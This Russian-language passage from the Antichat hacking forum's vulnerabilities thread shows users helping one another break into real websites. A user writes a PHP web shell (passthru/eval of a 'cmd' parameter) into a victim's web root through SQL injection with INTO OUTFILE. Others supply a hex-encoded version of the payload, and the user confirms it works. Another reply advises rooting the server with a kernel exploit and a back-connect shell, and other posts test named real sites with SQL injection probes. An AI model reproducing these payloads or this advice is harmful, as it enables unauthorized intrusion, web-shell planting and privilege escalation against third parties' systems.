HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13581  
Старый 03.06.2010, 10:11
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами: 10441826

Репутация: 1861


По умолчанию

Цитата:
Сообщение от stasiliy  
Помогите плз.
Узнал через пхп инъекц. доступ от МУСКУл.
Создаю в файле запрос
select '<?php passthru($_GET['cmd'])?>' into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
Пишет ошибку,так как у нас $_GET['cmd']
Подскажите как обойти эти кавычки =)
во-первых можно захексить -
Код:
select 0x3C3F70687020706173737468727528245F4745545B27636D64275D293F3E into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
во-вторых можно без кавычек
Код:
select '<?php passthru($_GET[cmd])?>' into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
в-третьих - юзай eval
 
Ответить с цитированием

  #13582  
Старый 03.06.2010, 10:22
stasiliy
Новичок
Регистрация: 26.09.2009
Сообщений: 22
С нами: 8749821

Репутация: 0
По умолчанию

вот создал запрос select '<? eval($_GET[cmd]);?>' into outfile блабла
файл создался, пишет ошибку
Parse error: syntax error, unexpected ')' in /usr/home/yana2/www/site10/public_html/lnd2.php on line 1

я чето не вижу в синтаксисе ошибку((
 
Ответить с цитированием

  #13583  
Старый 03.06.2010, 10:26
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от stasiliy  
вот создал запрос select '<? eval($_GET[cmd]);?>' into outfile блабла
файл создался, пишет ошибку
Parse error: syntax error, unexpected ')' in /usr/home/yana2/www/site10/public_html/lnd2.php on line 1

я чето не вижу в синтаксисе ошибку((

ты прямо подставляй запрос cmd=phpinfo();
 
Ответить с цитированием

  #13584  
Старый 03.06.2010, 10:54
stasiliy
Новичок
Регистрация: 26.09.2009
Сообщений: 22
С нами: 8749821

Репутация: 0
По умолчанию

Я ведь делаю запрос со своего сервера, с файла
$query ="select '<? echo eval($_GET['cmd']);?>' into outfile '/usr/home/yana2/www/site10/public_html/lnd10.php'";
$res = mysql_query($query);

ошибка syntax error

Если пишу eval($_GET[cmd]); <- без кавычек
то оштбка:yntax error, unexpected ')'

Помогите, может както кодировку понятную мускул зделать?
 
Ответить с цитированием

  #13585  
Старый 03.06.2010, 10:57
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от stasiliy  
Я ведь делаю запрос со своего сервера, с файла
$query ="select '<? echo eval($_GET['cmd']);?>' into outfile '/usr/home/yana2/www/site10/public_html/lnd10.php'";
$res = mysql_query($query);

ошибка syntax error

Если пишу eval($_GET[cmd]); <- без кавычек
то оштбка:yntax error, unexpected ')'

Помогите, может както кодировку понятную мускул зделать?
Хекси.
 
Ответить с цитированием

  #13586  
Старый 03.06.2010, 11:09
stasiliy
Новичок
Регистрация: 26.09.2009
Сообщений: 22
С нами: 8749821

Репутация: 0
По умолчанию

О )) спс)) все работает)
И еще один может глупый вопрос, можно ли както повысить права на папку имея только шелл?

Последний раз редактировалось stasiliy; 03.06.2010 в 11:15..
 
Ответить с цитированием

  #13587  
Старый 03.06.2010, 11:34
haito
Новичок
Регистрация: 27.05.2010
Сообщений: 13
С нами: 8399502

Репутация: 0
По умолчанию

привет команде;

Можно ли придать этим сайтом? потому что я пытался, но никакого результата

http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=36%27

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''36''' at line 1

http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=36%20order%20by%201000-- <-true
 
Ответить с цитированием

  #13588  
Старый 03.06.2010, 11:35
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Цитата:
Сообщение от stasiliy  
О )) спс)) все работает)
И еще один может глупый вопрос, можно ли както повысить права на папку имея только шелл?
Да, рутай сервер.
Ищи сплоит под версию ядра (uname -a), делай бэкконект и пробуй запустить плоент.
Если год версии ядра 2010, то врят ли порутаешь.
 
Ответить с цитированием

  #13589  
Старый 03.06.2010, 11:59
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами: 9610572

Репутация: 32
По умолчанию

Цитата:
Сообщение от stasiliy  
О )) спс)) все работает)
И еще один может глупый вопрос, можно ли както повысить права на папку имея только шелл?
Редко, если только пользователь, от которого запускается web-сервер, является владельцем или входит в группу владельцев папки, к которой необходимо поменять доступ.
 
Ответить с цитированием

  #13590  
Старый 03.06.2010, 12:21
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

Здесь есть SQL-inj?

http://www.bigr.nl/website/structure/main.php?page=people&subpage=person&id=51'+order+b y+1000+--+
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.